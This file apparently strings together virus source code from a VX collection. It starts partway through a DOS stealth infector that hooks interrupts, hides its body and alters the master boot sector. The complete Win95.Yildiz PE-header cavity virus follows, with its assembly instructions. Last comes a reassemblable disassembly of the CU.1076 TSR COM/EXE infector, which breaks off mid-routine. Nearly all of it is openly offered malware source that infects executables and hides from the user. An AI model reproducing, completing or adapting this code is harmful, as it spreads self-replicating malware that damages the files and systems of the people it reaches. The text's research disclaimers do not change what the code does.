MOV AX, CX ; AX = bytes to read.

ADD CX, File_Pos ; Calculate end offset after


; the read.

JC Calc_Count_Hdr ; Above 64k ?

CMP CX, 24 ; Does the read touch the


JB Sub_St_Size ; entire header?

Calc_Count_Hdr: MOV AX, 24 ; Calculate howmany bytes


SUB AX, File_Pos ; to stealth in the header.

MOV New_Read_Count, AX ; Save the new read count.

Sub_St_Size: SUB Read_Count, AX ; The header will be read by


; the virus, so adjust the
; caller read count.
PUSH AX

MOV AX, 4200h ; Seek to the host's clean


MOV CX, Orig_Size+2 ; header. *** The caller's
MOV DX, Orig_Size ; header offset should be
ADD DX, OFFSET Host_Header ; added aswell, now it screws
ADC CX, 0 ; up on header reads that
CALL Do_Old_Int21h ; don't start at offset 0.

POP CX ; CX = howmany bytes to


; stealth in header.
PUSH BP
MOV BP, SP

LDS DX, [BP+(3*2)] ; Read buffer of the caller.

POP BP

MOV AH, 3Fh ; Read the clean header


CALL Do_Old_Int21h ; into the caller's buffer.

PUSH CS
POP DS

PUSH AX
PUSH CX

ADD File_Pos, AX ; Update saved position.


ADC File_Pos+2, 0

MOV DX, File_Pos ; Restore file position.


MOV CX, File_Pos+2
MOV AX, 4200h
CALL Do_Old_Int21h

POP CX
POP AX

SUB CX, AX ; Not all bytes were read?


JNZ Error_St_Exit ; Then bail.

CMP Read_Count, 0 ; No more bytes need to be


JNZ Chk_Body_Reach ; read? Then IRET back.

POP CX
POP CX

MOV AX, CX ; AX = 0.

JZ Exit_Stealth_1

Error_St_Exit: POP DX
POP DX

Exit_Stealth_1: POP DX
POP DS

JMP IRET_Flags

Chk_Body_Reach: POP AX ; Value of AX on entry.


PUSH AX

MOV CX, File_Pos ; Original fileposition


MOV DX, File_Pos+2 ; where the action starts.

CMP DX, Orig_Size+2 ; Below virus' 64k ?


JB Calc_End_Pos

CMP CX, Orig_Size ; Below virus' code? If not,


JBE Calc_End_Pos ; the virusbody gets read or
; overwritten, so stealth it.

CMP AH, 40h ; If it's a write then go


JE Clean_Handle ; disinfect the handle.

POP AX
POP CX

XOR AX, AX ; Return 0 bytes read when


JZ Exit_Stealth_1 ; they try to read from after
; the original host.

Calc_End_Pos: ADD CX, Read_Count ; Calculate end position


ADC DX, 0 ; after the read/write.

CMP DX, Orig_Size+2 ; Below the virusbody?


JB Do_Function

CMP CX, Orig_Size


JBE Do_Function

CMP AH, 40h ; If it's a write then


JE Clean_Handle ; disinfect the handle.

MOV CX, Orig_Size


MOV DX, Orig_Size+2

SUB CX, File_Pos


SBB DX, File_Pos+2
OR DX, DX ; *** Obsolete instruction.
JZ Set_New_Byte_C

MOV CX, -1
SUB CX, New_Read_Count

Set_New_Byte_C: MOV Read_Count, CX

Do_Function: POP AX
POP CX
POP DX
POP DS
PUSH CX

PUSH AX
PUSH DX

MOV CX, CS:Read_Count


ADD DX, CS:New_Read_Count
CALL Do_Old_Int21h

ADD AX, CS:New_Read_Count

POP DX
POP CX

CMP CH, 3Fh ; It aint a read? Then it's


JE Exit_Stealth_2 ; a get/set filedate & time.

PUSH AX
PUSH DX

MOV AX, 5700h ; Get file's date & time.


CALL Do_Old_Int21h

INC AL ; AX = 5701h.
OR CL, (62/2) ; Set 60 seconds.
DEC CX
CALL Do_Old_Int21h

POP DX
POP AX

Exit_Stealth_2: POP CX
JMP IRET_Flags

Clean_Handle:
MOV WORD PTR Valid_Handle, 0001h
MOV File_Handle, BL

MOV AX, 4200h ; Seek to the old header.


MOV CX, Orig_Size+2
MOV DX, Orig_Size
ADD DX, OFFSET Host_Header
ADC CX, 0
CALL Do_Old_Int21h

MOV AH, 3Fh ; Read it in.


MOV CX, 24
MOV DX, OFFSET Buffer
NOP
CALL Do_Old_Int21h
MOV AX, 4200h ; Seek to the old EOF.
MOV DX, Orig_Size
MOV CX, Orig_Size+2
CALL Do_Old_Int21h

MOV AH, 40h ; Write new EOF marker.


XOR CX, CX
CALL Do_Old_Int21h

MOV AX, 4200h ; Seek to BOF.


XOR CX, CX
XOR DX, DX
CALL Do_Old_Int21h

MOV AH, 40h ; Restore old header.


MOV CX, 24
MOV DX, OFFSET Buffer
NOP
CALL Do_Old_Int21h

MOV AX, 4200h ; Restore original file pos.


MOV DX, File_Pos
MOV CX, File_Pos+2
CALL Do_Old_Int21h

POP AX
POP CX
POP DX
POP DS

JMP SHORT JMP_Old_Int21h

Check_Win_Exit:
POP BX ; Remove return IP off stack.
POP CX ; POP program's return CS.

PUSH CX
PUSH BX
PUSH AX

DEC CX ; Get program's MCB.


MOV DS, CX

MOV SI, 8 ; SI = name of terminating


; program.

CLD ; Fetch 1st word of filename.


LODSW
XCHG BX, AX

LODSW ; Fetch 2nd word of filename.


XCHG DX, AX

POP AX

CMP BX, 'IW' ; Is it WIN.COM that's


JNE J2_J_Old_i21h ; terminating?

CMP DX, 'N'


JNE J2_J_Old_i21h
DEC CS:Windows_Active ; If so, reset the flag.

J2_J_Old_i21h: JMP SHORT JMP_Old_Int21h

Stealth_Seconds:
PUSH AX
PUSH CX
PUSH DX

MOV AX, 5700h ; Get file's date & time.


CALL Do_Old_Int21h

PUSH AX
PUSH CX

CALL Check_60_Secs ; Check if it's infected.

POP CX
POP AX

POP DX
POP CX
POP AX

JNE JMP_Old_Int21h ; If it ain't then get out.

OR AL, AL ; Get file date & time?


JNZ Stealth_Set ; Else it's a set.

CALL Do_Old_Int21h ; Do the call.

AND CL, 11100000b ; Clear seconds.


JMP IRET_Flags

Stealth_Set: OR CL, (62/2) ; Set 60 seconds.


DEC CX

JNZ JMP_Old_Int21h ; This jump is always taken.

Do_Old_Int21h: PUSHF ; Simulate an interrupt 21h.


CALL DWORD PTR CS:Old_Int21h

RETN

JMP_Old_Int21h: JMP DWORD PTR CS:Old_Int21h

Host_Header: DB 0CDh, 20h


DB 22 DUP (0)

; This ISR stealths the first INT 12h and then unhooks itself, this way
; MEM and CHKDSK will report the untouched total DOS memory size.
New_Int12h:
PUSH DS
PUSH ES
PUSH BX

XOR AX, AX ; DS = IVT.


MOV DS, AX

LES BX, DWORD PTR CS:Old_Int12h

CLI ; Restore original INT 12h.


MOV DS:[(12h*4)], BX
MOV DS:[(12h*4)+2], ES
STI

POP BX
POP ES
POP DS

INT 12h ; Do the original INT 12h.

ADD AX, Virus_Size_1024 ; Stealth DOS memory size.

IRET

DB '10/23/92', 0
Origin = BYTE PTR $-1

File_Int21h:
CMP AX, 0EEE7h ; Residency check?
JE Return_ID_2

CMP AX, 3513h ; Get INT 13h ?


JE Get_Int13h_St

CMP AX, 3521h ; Get INT 21h ?


JE Get_Int21h_St

CMP AX, 2513h ; Set INT 13h ?


JE Set_Int13h_St

CMP AX, 2521h ; Set INT 21h ?


JE Set_Int21h_St

JMP DWORD PTR CS:600h+(Old_Int21h-File_Int21h)

Return_ID_2: MOV AX, 0D703h ; Return ID word to caller.


IRET

Get_Int13h_St: LES BX, DWORD PTR CS:600h+(Old_Int13h-File_Int21h)


IRET

Get_Int21h_St: LES BX, DWORD PTR CS:600h+(Old_Int21h-File_Int21h)


IRET

Set_Int13h_St: MOV CS:600h+(Old_Int13h-File_Int21h), DX


MOV CS:600h+(Old_Int13h-File_Int21h)+2, DS
IRET

Set_Int21h_St: MOV CS:[600h+(Old_Int21h-File_Int21h)], DX


MOV CS:[600h+(Old_Int21h-File_Int21h)+2], DS
IRET

Act_Partition DW 0

Boot_Int13h:
CMP DX, 80h ; 1st HD - head zero?
JNE JMP_Boot_i13h

CMP CX, Virus_Size_512+2 ; Operation concerns the


JNB JMP_Boot_i13h ; MBS or virussectors?
CMP AH, 02h ; Sector read?
JE Check_For_MBS

CMP AH, 03h ; Sector write?


JE Check_For_MBS

JMP_Boot_i13h: JMP DWORD PTR CS:[0000h] ; Jump to the previous ISR.


Ofs_Old_Int13h = WORD PTR $-2

Check_For_MBS: CMP CX, 1 ; It's the MBS ?


JNE Check_If_Write

CMP AH, 02h ; It is a MBS read?


JE Do_Read_Write ; Else it's a write.

PUSH SI

CALL Get_Act_Partition ; Get delta offset to active


; partition.

MOV ES:[BX+SI], 0200h ; Set the infected partition


; in the MBS so the written
; MBS will still be infected.
POP SI

Do_Read_Write: PUSH AX

MOV AL, 1 ; Only read/write to the MBS.

PUSHF ; Carry out the read/write.


CALL DWORD PTR CS:[0]
Ofs_Real_Int13h = WORD PTR $-2

POP AX

CMP AH, 03h ; It was a write?


JE Success_IRET

PUSH SI ; Else stealth the read.

CALL Get_Act_Partition

MOV ES:[BX+SI], 0101h ; Put back the original


; MS-DOS partition start.
POP SI

CMP AL, 1
JE Success_IRET

Check_If_Write: CMP AH, 03h ; It was a write?


JE Success_IRET

PUSH AX
PUSH CX
PUSH DX
PUSH DI

XOR AH, AH

MOV DI, BX ; ES:DI = readbuffer.

CMP CX, 1
MOV CX, 512
JNE Calc_Sec_Size

DEC AX ; Skip the MBS.


ADD DI, CX ; Next sector.

Calc_Sec_Size: MUL CX ; Sectorcount * 512.

OR DX, DX
JZ Clear_Buffer

MOV CX, 0

Clear_Buffer: XCHG CX, AX

CLD

Clear_Byte: STOSB
LOOP Clear_Byte

POP DI
POP DX
POP CX
POP AX

Success_IRET: CLC ; Mark success. *** The next


; XOR clears CF already.
XOR AH, AH

IRET_Flags: PUSH AX
LAHF

PUSH BP
MOV BP, SP

MOV [BP+(4*2)], AH ; Set new flags in stack.

POP BP
POP AX

IRET

; Get's the active partition.


Get_Act_Partition:

CALL Get_Delta_2
Get_Delta_2: POP SI
SUB SI, OFFSET Get_Delta_2

MOV SI, CS:[SI+Act_Partition]

RETN
End_Body:

Old_Int08h = WORD PTR $+0


Old_Int21h = WORD PTR $+4
Old_Int01h = WORD PTR $+8
Old_Int12h = WORD PTR $+8
Old_Int13h = WORD PTR $+12
Real_Int13h = WORD PTR $+16
Buffer = $+20
Read_Count = WORD PTR $+44
Host_Size = WORD PTR $+44
New_Read_Count = WORD PTR $+46
File_Pos = WORD PTR $+48
Host_Type = BYTE PTR $+49
Orig_Size = WORD PTR $+52
Valid_Handle = BYTE PTR $+56
File_Handle = BYTE PTR $+57

EXE_Header STRUC
EXE_ID DW 0
Image_Mod_512 DW 0
File_512_Pages DW 0
Reloc_Items DW 0
Header_Size DW 0
Min_Size_Mem DW 0
Max_Size_Mem DW 0
Program_SS DW 0
Program_SP DW 0
Checksum DW 0
Program_IP DW 0
Program_CS DW 0
Reloc_Table DW 0
EXE_Header ENDS

Find_FN_FCB STRUC
FCB_Drive DB 0
FCB_Name DB 8 DUP(0)
FCB_Ext DB 3 DUP(0)
FCB_Attr DB 0
FCB_Reserved DB 10 DUP(0)
FCB_Time DW 0
FCB_Date DW 0
FCB_Start_Clust DW 0
FCB_Size DW 0, 0
Find_FN_FCB ENDS

END START
; *************************************************************************
; ******************** ********************
; ******************** Win95.Yildiz ********************
; ******************** by ********************
; ******************** Black Jack ********************
; ******************** ********************
; *************************************************************************
;
;
;NAME: Win95.Yildiz
;AUTHOR: Black Jack [independant Austrian Win32asm virus coder]
;CONTACT: Black_Jack_VX@hotmail.com | http://www.coderz.net/blackjack
;TYPE: Win9x direct acting/global ring3 resident PE header cavity virus
;SIZE: 323 bytes (but of course infected files won't increase in size)
;
;DESCRIPTION: When an infected file is run, the virus takes control. It then
; tries to find the kernel32 base address by a simple algorithm
; which should make it compatible with Win9X and WinME (although I
; haven't tested it with the second one). After that it gets the
; undocumented Win9X API VxDCall0 and uses it to call int 21h. The
; VxDCall0 API is the very first exported API in Win9X; I don't
; know which API is first in WinNT, that's why unpredictable
; results may occur when the virus runs in that OS (I haven't tried
; it out, but of course the virus can't work in NT).
; Then it goes TSR (read more about this a bit later), and infects
; all PE EXE files in the current directory by overwriting the
; unused padding bytes in the PE header with the virus body.
; The memory residency consist in infecting kernel32.dll in memory.
; To do so, it creates a temporary file called "Yildiz." and writes
; the first 4KB of kernel32.dll there. Then this file is infected
; like any other PE file. And finally the content of the infected
; temp file is read back into kernel32 memory. Yep, you have read
; right, by using the int21h with VxDCall0 you can read from a file
; into read-only memory! (This trick was discovered by Murkry/IkX,
; read more about it in the comments to his Darkside virus source,
; published in Xine#3).
; As I have already said, the kernel32 is infected in memory just
; like any other file, this means the entry point is set to the
; virus, no APIs are hooked. As you should know, the entry point
; of a DLL is a init routine that is called whenever the DLL is
; loaded by a program. And since kernel32 is imported by all
; programs, this means for us that whenever a program is run (and
; kernel32 is mapped into the program's address space), our virus
; will infect all PE EXE files in the directory of the program.
;
;ASSEMBLE WITH:
; tasm32 /mx /m yildiz.asm
; tlink32 /Tpe /aa yildiz.obj,,, import32.lib
;
; there's no need for PEWRSEC or a similar tool, because the
; virus code is supposed to run in read-only memory anyways.
;
;DISCLAIMER: I do *NOT* support the spreading of viruses in the wild.
; Therefore, this source was only written for research and
; education. Please do not spread it. The author can't be hold
; responsible for what you decide to do with this source.
; ===========================================================================

virus_size EQU (virus_end - virus_start)

Extrn MessageBoxA:Proc ; for first generation only


Extrn ExitProcess:Proc
.386p
.model flat
.data
dd 0 ; dummy data, you know...

.code
virus_start:
pushad ; save all registers

xchg edi, eax ; put delta offset to EDI (EAX=start


; offset of program by default)

mov eax, [esp+8*4] ; EAX=some address inside kernel32

sub esp, size stack_frame ; reserve room on stack


mov esi, esp ; set ESI to our data on the stack

search_kernel32:
xor ax,ax ; we assume the least significant
; word of the kernel32 base is zero
cmp word ptr [eax], "ZM" ; is there a MZ header ?
JE found_kernel32 ; if yes, we found the correct
; kernel32 base address
dec eax ; 0BFF80000->0BFF7FFFF, and then the
; least significant word is zeroed
JMP search_kernel32 ; check next possible kernel32 base

tmp_filename db "Yildiz", 0
filespec db "*.EXE", 0

found_kernel32:
mov ebx, [eax+3Ch] ; EBX=kernel32 PE header RVA
add ebx, eax ; EBX=offset of kernel32 PE header

mov ebx, [ebx+120] ; EBX=export table RVA


mov ebx, [ebx+eax+1Ch] ; EBX=Address array of API RVAs
mov ebx, [ebx+eax] ; get the first API RVA: VxDCall0
add ebx, eax ; EBX=Offset VxDCall0 API
mov [esi.VxDCall0], ebx ; save it
lea ebp, [edi+int21h-virus_start] ; EBP=offset of our int21h procedure
; for optimisation reasons, the
; CALL EBP instruction is just 2 bytes

; ----- GO TSR --------------------------------------------------------------

lea edx, [edi+tmp_filename-virus_start] ; EDX=pointer to tmp filename


push edx ; save it on stack

push eax ; save kernel32 base address on stack

mov ah, 3Ch ; create temp file


xor ecx, ecx ; no attributes
call ebp ; call our int 21h procedure

xchg ebx, eax ; filehandle to EBX, where it belongs

pop edx ; EDX=kernel32 base address


push edx ; save it again

call write_file ; write start of kernel32 to temp file


call infect ; infect the temp file

pop edx ; EDX=kernel32 base address

mov ah, 3Fh ; read infected kernel32 fileststart


call read_write ; into kernel32 memory

mov ah, 3Eh ; close temp file


call ebp ; call our int 21h procedure

pop edx ; EDX=pointer to temp filename


mov ah, 41h ; delete temp file
call ebp ; call our int 21h procedure

; ----- INFECT ALL FILES IN CURRENT DIR -------------------------------------

mov ah, 2Fh ; get DTA


call ebp ; call our int 21h procedure

push es ; save DTA address to stack


push ebx

push ds ; ES=DS (standart data segment)


pop es

mov ah, 1Ah ; set DTA to our data area


lea edx, [esi.dta] ; DS:EDX=new DTA adress
call ebp ; call our int 21h procedure

mov ah, 4Eh ; find first file


xor ecx, ecx ; only files with standart attributes
lea edx, [edi+(filespec-virus_start)] ; EDX=offset of filespec

findfile_loop:
call ebp ; call our int 21h procedure
JC all_done ; no more files found?

mov ax, 3D02h ; open victim file for read and write
lea edx, [esi.dta+1Eh] ; DS:EDX=pointer to filename in DTA
call ebp ; call our int 21h procedure

xchg ebx, eax ; handle to EBX, where it belongs

call infect ; infect the file

mov ah, 3Eh ; close the victim file


call ebp ; call our int 21h procedure

search_on:
mov ah, 4Fh ; find next file
JMP findfile_loop

; ----- RESTORE HOST --------------------------------------------------------

all_done:
pop edx ; restore old DTA offset in DS:EDX
pop ds
mov ah, 1Ah ; reset DTA to old address
call ebp ; call our int 21h procedure
push es ; DS=ES (standart data segment)
pop ds

add esp, size stack_frame ; remove our data buffer from stack

popad ; restore all registers

db 05h ; add eax, imm32


entry_RVA_difference dd (host-virus_start) ; difference between host and
; virus entrypoint (EAX is virus
; entrypoint offset by default)
JMP eax ; jump to host entrypoint

; ----- END MAIN PART OF THE VIRUS CODE -------------------------------------

exit_infect:
pop edi ; restore EDI (delta offset)
RET ; return to caller

; ----- INFECT AN OPENED FILE (HANDLE IN BX) --------------------------------

infect:
push edi ; save EDI (delta offset)

mov edx, esi ; EDX=read/write buffer offset


mov ah, 3Fh ; read start of file
call read_write

cmp word ptr [esi], "ZM" ; is it an exe file ?


JNE exit_infect ; cancel infection if not

mov ecx, [esi+3Ch] ; ECX=new header RVA


cmp ecx, 3*1024 ; check if DOS stub is small enough
; so that all the PE header is in
; our buffer
JA exit_infect ; if not, cancel infection

lea edi, [esi+ecx] ; EDI=PE header offset in memory


cmp word ptr [edi], "EP" ; is it an PE file ?
; (I know that the PE marker is
; actually a dword, but by only
; checking one word we save a byte
; of virus code)
JNE exit_infect ; cancel infection if not

cmp dword ptr [edi+28h], 4096 ; check if entrypoint RVA is in the


; first 4 KB of the file
JB exit_infect ; if yes, the file must be already
; infected, cancel infection

add ecx, 24 ; add size of FileHeader


movzx eax, word ptr [edi+14h] ; EAX=size of Optional header
add ecx, eax ; add it to ECX
movzx eax, word ptr [edi+6] ; EAX=NumberOfSections
imul eax, eax, 40 ; get size of section headers to EAX
add ecx, eax ; add it to ECX, now it points to the
; end of the used part of the PE
; header, where the virus will be.

mov edx, ecx ; EDX=virus RVA


xchg dword ptr [edi+28h], edx ; set it as new entrypoint RVA
sub edx, ecx ; EDX=difference between old and new
; entrypoint RVA
mov eax, [edi+54h] ; EAX=SizeOfHeaders (aligned to
; FileAlign)

lea edi, [esi+ecx] ; EDI=virus offset in buffer

sub eax, ecx ; EAX=free room for us to use


mov cx, virus_size ; ECX=size of virus (the most
; significant word of ECX should be 0)
cmp eax, ecx ; enough room for the virus ?
JL exit_infect ; cancel infection if not

pop eax ; EAX=delta offset


push eax ; save it again to stack
xchg esi, eax ; ESI=delta offset, EAX=data buffer

cld ; clear direction flag


rep movsb ; move virus body into buffer

xchg esi, eax ; ESI=pointer to our data on stack

mov [edi-(virus_end-entry_RVA_difference)], edx ; store difference


; between old and new entrypoint

pop edi ; restore EDI (delta offset)

mov edx, esi ; EDX=offset of read/write buffer

; now write modified start of file,


; then return to caller

write_file:
mov ah, 40h ; write to file

read_write:
xor ecx, ecx ; ECX=0
pushad ; save all registers

xor eax, eax ; EAX=4200h (set filepointer from


mov ah, 42h ; start of the file
cdq ; CX:DX=0 (new filepointer)
call ebp ; call our int 21h procedure

popad ; restore all registers

mov ch, 10h ; ECX=4096 (size of read/write buffer)

; now execute int 21h and return

int21h: ; protected mode int21


push ecx ; push parameters
push eax
push 2A0010h ; VWIN32_Int21Dispatch function
call ss:[esi.VxDCall0] ; call VxDCall0 API
ret

virus_end:

; This is our data that will be stored on the stack:

stack_frame struc
buffer db 4096 dup(?)
dta db 43 dup(?)
VxDCall0 dd ?
stack_frame ends

host:
push 0
push offset caption
push offset message
push 0
call MessageBoxA

push 0
call ExitProcess

caption db "Win95.Yildiz Virus (c) 2000 Black Jack", 0


message db "first generation dropper", 0

end virus_start
comment \

Name : CU.1076 (according to AVP, obviously named after infection


: marker in CRC field of EXE header.
Author : ?
Type : TSR EXE/COM infector with sizestealth
Size : 1076 bytes
Origin : ?
When : ?
Status : ?
Disassembled by : Black Jack

Description:
When an infected file is executed, the virus gains control and goes TSR by
the standart MCB method and hooks int21h. It then infects COM and EXE files
when they are executed or loaded by function 4Bh. The infection process is
100% standart. Date, Time and Attributes are stored (except that the seconds
filed holds the infection mark 60), and a dummy int24h is installed during
infection. Also, the virus uses size stealth for FCB (functions 11h, 12h)
handle (functions 4Eh, 4Fh) and Win95 (functions 714Eh, 714Fh), although
the handle stealth won't work because of lots of bugs. Also it has a kind
of time-stealth, on the get time function (5700h) it returns the seconds
field of the last infected file to hide its infection mark.

Comments:
This is just a stupid and boring DOS virus, I just disassembled it because
of great boredom and because I had found an infected file on my mothers PC
(but please don't ask me how it came there). Its full of bugs and rubbish.

Reassembly tested with Tasm 3.1 and TLink 3.0 .

TASM /M cu
TLINK /t cu

virus_size = (v_end - v_start)

.model tiny
.286
.code
org 100h
start:
nop ; dummy host
nop
nop

v_start:
push es ; save PSP segment

call next ; calculate delta offset


next:
pop bp
sub bp,offset next ; BP=delta offset

mov ax,1818h ; already resident?


int 21h
cmp bx,0C001h
je already_resident ; yes, we're there

mov ax,ds ; AX=PSP segment


dec ax ; AX=MCB segment
mov ds,ax ; DS=MCB segment
mov cl,"M" ; marker: not the last MCB
xchg ds:[0],cl ; mark our MCB as not the last
sub word ptr ds:[3],40h ; resize MCB
sub word ptr ds:[12h],40h ; end segment of this program
mov bx,ds:[12h] ; BX=segment of new virus MCB
mov ds,bx ; DS=segment of new virus MCB
inc bx ; BX=segment of the virus
mov es,bx ; ES=segment of the virus
mov ds:[0],cl ; marker of virus MCB
mov word ptr ds:[1],8 ; mark as system MCB
mov word ptr ds:[3],3Fh ; set virus segment size in MCB

push cs ; DS=CS
pop ds
xor di,di ; DI=0
lea si,[bp+v_start] ; SI=start of virus code
mov cx,virus_size ; CX=size of virus
cld ; clear direction flag
rep movsb ; copy virus to TSR location

push es ; save virus segment

push es ; DS=ES=virus segment


pop ds

mov ax,3521h ; get int21h vector


int 21h
mov ds:[int21h_offset-v_start],bx ; save it
mov ds:[int21h_segment-v_start],es

pop es ; ES=virus segment

mov ax,2521h ; set new int21h vector


mov dx,(int21h_handler-v_start) ; DS:DX=new int handler
int 21h

already_resident:
pop es ; ES=PSP segment
push cs ; DS=CS
pop ds

cmp cs:[bp+host_type],"XE" ; is host an EXE?


je restore_exe

restore_com:
lea si,[bp+header] ; original first bytes of host
mov di,100h
cld ; clear direction flag
movsw ; move start of host back
movsb

push es ; DS=ES=PSP segment


pop ds
push 100h ; jump to host start
ret

restore_exe:
mov ax,es ; AX=ES=PSP segment
add ax,10h ; AX=start segment of image
push es ; DS=ES=PSP segment
pop ds
add word ptr cs:[bp+host_cs],ax ; relocate jump to host
add ax,word ptr cs:[bp+host_ss] ; relocate host SS
mov ss,ax ; restore host SS
mov sp,word ptr cs:[bp+host_sp] ; restore host SP

db 0EAh ; jmp far opcode


host_ip dw ?
host_cs dw ?

host_ss dw ?
host_sp dw ?

int21h_handler:
cmp ax,1818h ; residency check
jne no_residency_check
mov bx,0C001h ; we're already installed
iret ; quit interrupt execution

no_residency_check:
cmp ah,4Bh ; load/execute file
jne no_exec
jmp infect

no_exec:
cmp ah,11h ; FCB find first file?
je fcb_stealth
cmp ah,12h ; FCB find next file?
je fcb_stealth

cmp ah,4Eh ; handle find first file?


jne no_findfirst_handle
jmp handle_stealth
no_findfirst_handle:
cmp ah,4Fh ; handle find next file?
jne no_findnext_handle
jmp short handle_stealth
nop
no_findnext_handle:

cmp ax,714Eh ; LFN find first file?


jb no_LFN_stealth
cmp ax,714Fh ; LFN find next file?
ja no_LFN_stealth
jmp LFN_stealth

no_LFN_stealth:
cmp ax,5700h ; get file date/time?
jne org_int21h ; Jump if not equal
jmp time_stealth

org_int21h:
db 0EAh
int21h_pointer equ this dword
int21h_offset dw ?
int21h_segment dw ?

; ----- FCB STEALTH ---------------------------------------------------------


fcb_stealth:
pushf ; simulate int21h call
call dword ptr cs:[int21h_pointer-v_start]

pushf ; save flags


pusha ; save all regs
push ds ; save segments
push es

or al,al ; FCB search failed?


jnz exit_fcb_stealth ; if so, quit stealth routine

mov ah,51h ; get active PSP segment to BX


int 21h

mov es,bx ; ES=active PSP segment


cmp bx,es:[16h] ; is it COMMAND.COM calling?
jne exit_fcb_stealth ; if not, don't do stealth

mov ah,2Fh ; get DTA to ES:BX


int 21h

push es ; DS:BX=DTA
pop ds

cwd ; DX=0

cmp byte ptr [bx],0FFh ; is it an extended FCB?


jne no_extended_fcb
add bx,7 ; convert to regular FCB
no_extended_fcb:
mov cl,[bx+17h] ; CL=low byte of filetime
and cl,00011111b ; CL=seconds
cmp cl,1Dh ; seconds=60 means infected
jne exit_fcb_stealth ; if not, then exit stealth routine

mov ax,[bx+9] ; AX:CL=file extension


mov cl,[bx+1Bh]
cmp ax,"OC" ; is it a COM file?
jne fcb_stealth_no_com
cmp cl,"M"
jne exit_fcb_stealth ; its not an EXE/COM
jmp short do_fcb_stealth
nop
fcb_stealth_no_com:
cmp ax,"XE" ; is it an EXE file?
jne exit_fcb_stealth ; its not an EXE/COM
cmp al,"E"
jne exit_fcb_stealth ; its not an EXE/COM
do_fcb_stealth:
sub word ptr [bx+1Dh],virus_size ; stealth filesize
sbb word ptr [bx+1Ch],0 ; stealth filesize

exit_fcb_stealth:
pop es ; restore setment registers
pop ds
popa ; restore all regs
popf ; restore flags
retf 2 ; return from INT and keep the flags

; ----- HANDLE STEALTH ------------------------------------------------------


; note: this routine is much to buggy to work.

handle_stealth:
pushf ; push flags
call dword ptr cs:[int21h_pointer-v_start]
jc findfirstnext_failed
pushf ; save flags
pusha ; save all registers
push ds ; save segment registers
push es
push di ; save DI (useless)

mov ah,2Fh ; get DTA to ES:BX


int 21h
; BUG! DS should be set to ES here!!!

mov cl,[bx+16h] ; CL=low byte of filetime


and cl,00011111b ; CL=seconds of filetime
cmp cl,1Dh ; seconds=60 means infected
jne exit_handle_stealth

push si ; save SI (useless)


lea si,[bx+1Eh] ; ES:SI=filename
call get_extension ; get file extension to AX:CL
pop si ; restore SI

cmp ax, "OC" ; could it be a COM file?


jne handle_stealth_no_com ; check for an EXE
cmp cl,"M" ; really a COM?
jne exit_handle_stealth ; if not, exit stealth routine
jmp short do_handle_stealth
nop

handle_stealth_no_com:
cmp ax,"XE" ; could it be an EXE file?
jne exit_handle_stealth ; no EXE/COM, leave stealth routine
cmp cl,"E" ; really an EXE?
jne exit_handle_stealth ; no EXE/COM, leave stealth routine

do_handle_stealth:
sub word ptr es:[bx+1Ah],virus_size ; fixup filesize
; BUG! hiword of filesize unchanged!!!

exit_handle_stealth:
pop di ; restore DI
pop es ; restore segment registers
pop ds
popa ; restore all registers
popf ; restore flags

findfirstnext_failed:
retf 2 ; return from INT and keep the flags

; ----- LONG FILENAME (WIN95) STEALTH ---------------------------------------


LFN_stealth:
pushf ; simulate int21h call
call dword ptr cs:[int21h_pointer-v_start]
; ES:DI=finddata structure

pushf ; save flags


pusha ; save all regs
push ds ; save segments
push es

jc exit_lfn_stealth ; exit on error


nop
nop
push es ; DS=ES
pop ds

mov ax,si ; SI=DateTimeFormat


cmp ax,1 ; 1 means DOS format for date/time
je dos_datetime_format
nop
nop
mov ax,71A7h ; convert date/time format
xor bl,bl ; BL=0: Win95 format to DOS format
mov si,di
add si,14h ; DS:SI=ptr to filetime
pushf ; simulate int21h call
call dword ptr cs:[int21h_pointer-v_start]
; return CX=filetime, DX=filedate
jmp short filetime_in_CX
nop ; stupid single-pass assembler

dos_datetime_format:
mov cx,es:[di+14h] ; get filetime in CX
filetime_in_CX:
and cl,00011111b ; CL=file seconds
cmp cl,1Dh ; seconds=60 means infected
jne exit_lfn_stealth ; if not, exit stealth routine
nop
nop

push si ; save SI (useless)


lea si,[di+2Ch] ; DS:SI=filename ptr
call get_extension ; get filename extension to AX:CL
pop si ; restore SI

cmp ax,"OC" ; could it be a COM file?


jne lfn_stealth_no_com ; not a COM
nop
nop
cmp cl,"M" ; really a COM?
jne exit_lfn_stealth ; no COM/EXE, leave stealth routine
nop
nop
jmp short do_lfn_stealth
nop

lfn_stealth_no_com:
cmp ax,"XE" ; could it be an EXE file?
jne exit_lfn_stealth ; if not, leave stealth routine.
nop
nop
cmp cl,"E" ; is it really an EXE?
jne exit_lfn_stealth ; no COM/EXE, leave stealth routine
nop
nop

do_lfn_stealth:
sub word ptr es:[di+20h],virus_size ; fixup filesize
sbb word ptr es:[di+22h],0

exit_lfn_stealth:
pop es ; restore segment registers
pop ds
popa ; restore all registers
popf ; restore flags
retf 2 ; return from INT and keep the flags
; ----- GET THE FILE EXTENSION ----------------------------------------------
get_extension:
lodsb ; get a char from filename
cmp al,"." ; end of filename?
jne get_extension ; if not, search on

cld ; clear direction - useless here


lodsw ; get first 2 bytes of extension to AX
xchg cx,ax ; move them to CX
cld ; clear direction - useless again
lodsb ; get last byte of extension to AL
xchg cx,ax ; AX:CL=file extension
ret

; ----- TIME STEALTH --------------------------------------------------------


time_stealth:
pushf ; Push flags
call dword ptr cs:[int21h_pointer-v_start]

pushf ; save flags


pusha ; save all registers
push ds ; save segment registers
push es

and cl,00011111b ; CL=seconds of filetime


cmp cl,1Dh ; seconds=60 means infected
jne no_time_stealth
and cx,11100000b ; clear seconds of filetime
add cl,byte ptr cs:[seconds-v_start] ; set new seconds field
no_time_stealth:
pop es ; restore segment registers
pop ds
popa ; restore all registers
popf ; restore flags
retf 2 ; return from INT and keep the flags

; ----- INFECTION -----------------------------------------------------------


infect:
pusha ; save all registers
push ds ; save also segment registers
push es

push ds ; save DS (segm to filename)


xor ax,ax ; AX=0
mov ds,ax ; DS=AX=0=IVT segment
mov ax, offset int24h_handler ; BUG! forgotten to sub v_start
mov bx,cs ; BX:AX=ptr32 to int24h handler
cli ; disable interrupts
xchg ds:[24h*4],ax ; set new handler to int24h
xchg ds:[24h*4+2],bx
mov word ptr cs:[int24h_offset-v_start],ax ; save old
mov word ptr cs:[int24h_segment-v_start],bx ; handler
sti ; enable interrupts
pop ds ; restore DS (filename segm)

mov ax,4300h ; get attributes of victim


int 21h

push dx ; save filename pointer of


push ds ; victim file
push cx ; save attributes of victim

mov ax,4301h ; reset attributes of victim


xor cx,cx ; CX=new attributes=0
int 21h
jnc get_attributes_ok
jmp reset_attributes

